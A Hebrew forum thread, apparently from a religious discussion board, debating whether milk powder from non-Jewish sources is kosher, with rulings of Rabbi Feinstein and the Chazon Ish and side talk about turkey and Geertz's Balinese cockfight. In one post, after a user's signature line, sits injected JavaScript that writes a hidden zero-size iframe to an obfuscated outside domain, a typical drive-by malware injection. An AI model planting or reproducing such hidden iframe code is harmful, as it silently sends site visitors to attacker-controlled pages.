בית פורומים עצור כאן חושבים

אבקת חלב נוכרי

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-21/8/2017 18:55 לינק ישיר 

מזכיר לי את מחקרו המפורסם של קליפורד גירץ על התרנגולים באי בָּאלי... וזהו סיכומו:

פניה של באלי מתגלים בזירת התרנגולים. כי הנלחמים בה הם רק למראית עין תרנגולים. לאמיתו של דבר הם גברים... עובדת היותו של התרנגול סמל זכרי מובהק אינה מוטלת בספק, ולדידם של הבאלינזים היא גם ברורה מאליה, לא פחות מן העובדה שהמים זורמים במורד.

ומצ"ב הקטע המלא, שלו הייתי I_N_RUBIN הייתי מצטטו כלשונו, אבל יש דברים שרק אלהים (או רובין) יכול... 

דדווח על תוכן פוגעני

נשלח ב-21/8/2017 18:56 לינק ישיר 

ועוד משהו קטן לגבי העיסוק המופרז בתרנגולים:

דדווח על תוכן פוגעני

נשלח ב-21/8/2017 21:08 לינק ישיר 

הבעיה בעוף החדש- כי אין לו מסורת שחיטה. והשאלה איך התירו את תרנגול ההודו?
ויש לישב את חיוב למסורת שחיטה חידש הפרי מגדים
.גילוי אמריקה ותרנגול ההודו היו לפניו.

דדווח על תוכן פוגעני

נשלח ב-21/8/2017 22:54 לינק ישיר 

החיוב לא לאכול עוף על-פי סימני טהרה אלא אם יש עליו מסורת שהוא טהור, מקורו בפירוש רש"י לחולין סב:, וכן פסק הרמ"א. תרנגול הודו הותר בדיעבד לאחר שהציבור נהג בו היתר, כי כבר הוחזק להיתרא ואין ראיה לאוסרו, ומשום שבא"י נהגו לאוכלו.

תוקן על ידי מם80 ב- 21/08/2017 22:54:55

דדווח על תוכן פוגעני

נשלח ב-21/8/2017 23:37 לינק ישיר 

מיימוני כתב:

נישטאיך

ברוך השב!!

איך למדנו תורה ואתה היית בחוץ? (ע"פ הגמרא כמובן).

עכשו אני מחכה לאשכול על עוף הבראקלי והמקורות! בבקשה! תחסוך לי זמן...

שומר פיו ולשונו - שומר מצרות נפשו< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

יפה שאתה מברך את חברך אחרי שובו, אבל למה זה צריך לגרור את הכנסת המחלוקת ההזויה על התרנגול המזוקן לתוך השרשור שלי.
שיפתח שרשור חדש על המלחמות בין הכשרות של העידה לעשרות של לנדאו.

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-18/11/2018 22:48 לינק ישיר 

לשאלה הפותחת. : יש היתר כללי של הרב פיינשטיין להיתר חלב שנחלב על ידי גוי, משתי סיבות, אחת; החלב פרה עולה היום זול יותר מחלב טמא ואין חשש שיערבו אותו וימכרו אותו כחלב פרה, . סיבה שניה ; שיש פיקוח
הדוק של המדינה על מרכיבי המוצרים וזה כבר נכנס בגדר מירתת. שהגוי מפחד לעבור על החוק ולקבל קנס. 

בנוסף לזה אבקת חלב הותרה אף על ידי פוסקים מחמירים, מצד שפנים חדשות באו לכאן, ויתכן אף שבמציאות לא ניתן להפיק אבקה מחלב בהמה טמאה.

לכן במוצרים נרשם חלב נכרי , או אבקת חלב נכרי, שבאבקה יש סיבות נוספות להתיר. 

דדווח על תוכן פוגעני

נשלח ב-23/11/2018 10:32 לינק ישיר 

תלמיד לא רק הרב פיינשטין התיר חלב נכרי גם החז'א יו'ד מד. למצאו נקודת זכות בחב'ד - אבקת חלב נכרי אסורה כנראה בגל בישול עכו'ם.- (אני לא בטוח שהם חשבו על כך כשאסרו).

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > אבקת חלב נוכרי
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 סך הכל 2 דפים.

bholext